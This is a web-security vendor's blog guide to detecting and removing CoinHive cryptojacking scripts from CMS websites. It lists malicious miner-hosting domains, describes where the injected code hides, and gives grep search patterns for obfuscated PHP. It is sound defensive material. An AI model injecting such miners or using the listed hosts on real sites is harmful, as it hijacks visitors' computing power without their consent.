911 Hack Removal

Removing Cryptojacking CoinHive Malware from your WordPress, Magento, Drupal & Prestashop websites

Updated on: May 4, 2020

Removing Cryptojacking CoinHive Malware from your WordPress, Magento, Drupal & Prestashop websites

What is Crypto Mining Malware (CoinHive Javascript)? How are you affected?

CoinHive is an online service which provides cryptocurrency miners (crypto mining malware) that can be installed on websites using JavaScript. The JavaScript miner runs in the browser of the website visitors and mines coins on the Monero blockchain. It is promoted as an alternative to placing advertising on the website. And turns out, it is being used by hackers as malware to hijack end customers of a website by infected the website in the first place.

To mine the Monero coin using CoinHive, all you have to do is place a small JavaScript snippet in the header/footer of your website. When a visitor comes to the site, the CoinHive JavaScript gets activated and starts utilizing the CPU power available to it. With 10–20 active miners on the site, the average monthly revenue is about 0.3 XMR (~$109). To multiply their revenue, hackers have been exploiting vulnerable websites by injecting crypto mining malware (CoinHive).

While CoinHive itself is not a malicious service, it has been extensively used by hackers to mine coins using hacked websites. As a result, many malware scanners and security agencies have blacklisted the domain.

Flagged Domains Hosting the Crypto Mining Code

We have compiled a list of 3rd party domains that have been seen to host as CoinHive code using by the malware. The names of the JavaScript scripts are intentionally named after common file names so that they appear to be legitimate and webmaster doesn’t get suspicious on seeing them.

  • ads.locationforexpert[.]com
  • camillesanz[.]com/lib/status.js
  • security.fblaster[.]com
  • fricangrey[.]top/redirect_base/redirect.js
  • alemoney[.]xyz/js/stat.js
  • africangirl[.]top/redirect_base/redirect.js
  • ribinski[.]us/redirect_base/redirect.js
  • aleinvest[.]xyz/js/theme.js
  • babybabybabyoooh[.]net/beta.js
  • www.threadpaints[.]com/js/status.js
  • oneyoungcome[.]com/jqueryui.js
  • wp-cloud[.]ru
  • doubleclick1[.]xyz
  • doubleclick2[.]xyz
  • doubleclick3[.]xyz
  • doubleclick4[.]xyz
  • doubleclick5[.]xyz
  • doubleclick6[.]xyz
  • api[.]l33tsite[.]info
  • ws[.]l33tsite[.]info

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

Finding the crypto mining malware(CoinHive)

If you detect that your website has been running crypto-mining scripts without your knowledge, it is highly likely that your website is hacked or has been infected. Here are some steps you can take to identify if your website is hacked:

  1. Open the website in your web browser and select the “View Source” option
  2. In the webpage source, scan for JavaScript code that look fishy:
    1. Flagged domains as listed above
    2. Unrecognized domain/file names
    3. Initialization script for CoinHive

crypto mining malware (Coinhive fix)
CoinHive Initialization Code
  • Also look for malware code in the core website files on your server. If you are an Astra customer, start a Malware Scan from your Dashboard. If not, you can perform the following steps:
    1. Examine recently modified files on the server using the following SSH command
      find /path-of-www -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
    2. Search for common malware strings using the following SSH command:
      find /var/www -name "*.php" -exec grep -l "eval(" {} \;
      Replace the string in bold with the ones listed below and run the command again:

      1. echo(gzinflate(base64_decode
      2. coinhive (Crypto-Jacking Code Malware)
      3. locationforexpert
      4. base64_decode
      5. gzinflate(base64_decode
      6. eval(base64_decode
    3. Open the files that are flagged by these searches
  • Fixing Crypto Mining Coinhive Malware WordPress

    We’ve seen that core WordPress files have been modified to place the malware code. In many cases, the theme files have also been hijacked to place the JavaScript crypto mining code. The malware checks the user-agent of the request and only includes the malicious JS code if the visitor it not a search engine bot from Google/Bing/Yahoo etc.

    Malicious code infecting the headers.php file in WordPress themes to remove crypto mining malware (Coinhive fix)
    Malicious code infecting the headers.php file in WordPress themes

    Some of the files you should check and compare for modifications:

    • index.php
    • wp-admin/admin-header.php
    • wp-includes/general-template.php
    • wp-includes/default-filters.php
    • wp-includes/manifest.php.
    • Look for unrecognized code in header.php in your theme folder
    • functions.php

    Check commonly hacked WordPress files and how to fix them

    Fixing Crypto Mining Coinhive Malware for Magento

    If you are using Magento, look for crypto mining malware in the database. Open the ‘core_config_data table’ table using a tool like phpMyAdmin and look for the value of design/head/includes. Examine the code and remove any JavaScript files being included there using the <script> tag.

    Also, check the Copyright text in the footer to make sure no additional malicious code is given here. Navigate and examine  System -> Configuration -> Design -> Footer -> Copyright.

    Don’t forget to clear all your Magento after removing any malicious code.

    Worried about your website’s safety in light of rampant online vulnerabilities? Astra’s security suite can detect crypto mining hacks & further your protection from online vulnerabilities.

    Did you detect a suspicious crypto mining script? Drop us a message on the chat widget and we’d be happy to help you fix it. Fix my website now.

    Fixing the Crypto Malware(Coinhive) Hack from OpenCart

    Some of the common files infected in OpenCart are mentioned below. The steps to clean are similar to those mentioned for WordPress. Check the integrity of these files by comparing them with the original OpenCart code.

    • index.php
    • catalog/view/theme/default/template/common/header.tpl
    • catalog/view/theme/default/template/common/header.twig

    Fixing CoinHive Malware in Drupal

    In the case of Drupal sites, look at .js files of modules. We found the crypto mining code in the Google Analytics module:

    • sites/all/modules/google_analytics/googleanalytics.js

    The CoinHive code was added to this file, right after the Google Analytics code. It triggered the code to begin mining of the coins in the client’s browser.

    Cryptomining Malware CoinHive in Database

    Hackers inject Malicious CoinHive Crypto mining code into the website’s database. Here is the screenshot of the code.

    Coinhive malware in databse of WordPress Magento Opencart Drupal

    Preventing Cryptojacking Malware (CoinHive) Hack

    • Perform regular file integrity monitoring: Use tools like Astra to regularly monitor files on the server and see when they have changed. Hackers tend to modify files on the server and add malware, and viruses in the core files of your website. Such code can be executed server-side i.e in PHP, Python etc or even on the client’s browser, i.e in JavaScript.
    • Only include JavaScript files from trusted sources and CDNs: Be careful before you include JS files into your website. JavaScript is a very powerful tool and
    • Create a Content Security Policy (CSP): It is a computer security standard to prevent code injection attacks like cross-site scripting (XSS), clickjacking etc. which allow execution of malicious content in the trusted web page on client browsers. Read this guide from Google about the fundamentals of CSP and how you can set one.
    • Regularly update your CMS: Security patches/updates are often released with newer versions of the CMS. It is highly recommended to routinely scan for new versions and upgrade.
    • Install ALL security patches released by vendors: Almost all CMSs release security patches as and when critical issues are reported. Subscribe to their security mailing lists/RSS feeds and keep your software up to date.

    Conclusion

    CoinHive itself is not a malicious service, but it has been extensively used by hackers to mine cryptocurrencies like Ethereum, Litecoin etc. To mitigate such unauthorized use, CoinHive has released a new ‘AuthedMine’ version of their JavaScript library which requires explicit consent from the site visitors to begin mining the coins. However, the older version is still out there allowing hackers to mine coins from unsuspecting site visitors and owners of hacked sites.

    As an online business owner, your website is the center of your business and needs continuous security monitoring to ensure smooth functioning of your business. We’re happy to help you in this mission to keep your website secure and malware free.

    Also, check our blog post on RawGit CDN is Abused by CryptoLoot Cryptominers.

    How Astra protects you from CoinHive and other malware attacks?

    At Astra, we have a team of security experts who daily resolve several crypto malware issues and ensures it come back again. Our powerful web application firewall protects the website in real time from Malware, XSS, SQL injection and 80+ threats. Every request coming to your website is scanned through our security engine and only legitimate request are passed.

    Don’t take our words for it. See it for yourself!

    Peek inside Astra
    Web Application Firewall Magento, Opencart Prestashop

    Take an Astra Demo now.

    Was this post helpful?

    Tags: , , ,

    Ananda Krishna

    Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France).At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and shared his knowledge at various forums & invited talks.
    guest

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    3 Comments
    Oldest
    Newest Most Voted
    Inline Feedbacks
    View all comments
    trackback

    […] More details on finding this malware & fixing it can be found in our detailed guide here. […]

    energyresourcing
    1 year ago

    Nice Blog! I liked it. Thanks for sharing it.

    John
    1 year ago

    Good information. Coinhive is still a pain in the ass. Hackers are exploiting CMS systems around the world for this.

    Psst! Hi there. We’re Astra.

    We make security simple and hassle-free for thousands
    of websites and businesses worldwide.

    Our suite of security products include firewall, malware scanner and security audits to protect your site from the
    evil forces on the internet, even when you sleep.

    earth spiders cards bugs spiders

    Made with ❤️ in USA France India Germany